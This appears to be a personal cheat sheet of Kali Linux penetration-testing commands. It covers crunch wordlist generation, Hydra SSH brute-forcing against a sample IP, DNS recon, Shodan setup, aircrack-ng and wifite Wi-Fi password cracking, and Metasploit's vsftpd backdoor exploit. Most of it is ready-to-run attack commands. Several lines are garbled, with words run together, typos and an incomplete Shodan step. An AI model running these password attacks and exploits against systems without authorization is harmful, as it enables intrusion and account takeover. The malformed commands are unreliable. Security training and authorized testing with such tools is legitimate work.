Kali Pentest Netsec
Password Cracking
generate wordlists with CRUNCH
start Crunch on Kali
crunch <min> <max> <caracter set> -o <output file>
> crunc 5 18 password123$ -o wordlist.txtif youre a certain a certain string is in a password,ie "ballz" is in a user's password in any permutation,
> crunch 5 18 -p ballz <insert any other strings> > crunch 3 20 -p ballz nutz deez -o wordlist.txtget max 25 # of passwords and split wordlists by chunks of 30MB each
> crunch 3 10 -c 25 -b 30mb -o START
compress wordlist
> crunch 3 10 pass123 -z 7z -o START
HYDRA
crack passwords for single username
hydra -l username -P pw.txt -vV -f -t 5 192.168.50.235 ssh
crack pw from username list
hydra -L users.txt -P pw.txt -vVfF -t 5 192.168.50.235 ssh
Domain sniffing
get all pub IPs for domain
fierce --domain mydomain.com
also query: dnsdumpster.com
Shodan
pip3 install shodan
shodan init <API KEY>
scan a IP range
scan
Wifi Cracking
apt install aircrack-ng
put wifi iface into Monitor mode
check if iface can do monitor mode
iw list (check Mode)
airmon-ng check
kill procs holding up iface
airmon-ng check kill
start monitor
airmon-ng start <name of wifi iface>
stop monitor
airmon-ng stop wlan0mon
use wifite to do all above
wifite --wpa --dict /usr/share/wordlists/rockyou.txt --kill
crack password of captured pcap
aircrack-ng capturedpackets.cap -w wordlist.txt
Metasploit
install
curl curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod +x msfinstall && ./msfinstall
msfdb init
enter console
msfconsoleconfigure target and port
> set RHOST <IP or hostname>> set RPORT <PORT>
search payload,
search type:exploit platform:unixsearch type:exploit sshsearch type:exploit platform:osxexample: vsfptpd
use exploit/unit/ftp/vsftpd_234_backdoorcheck current payload and options
show optionsshow payloadsrun payload
run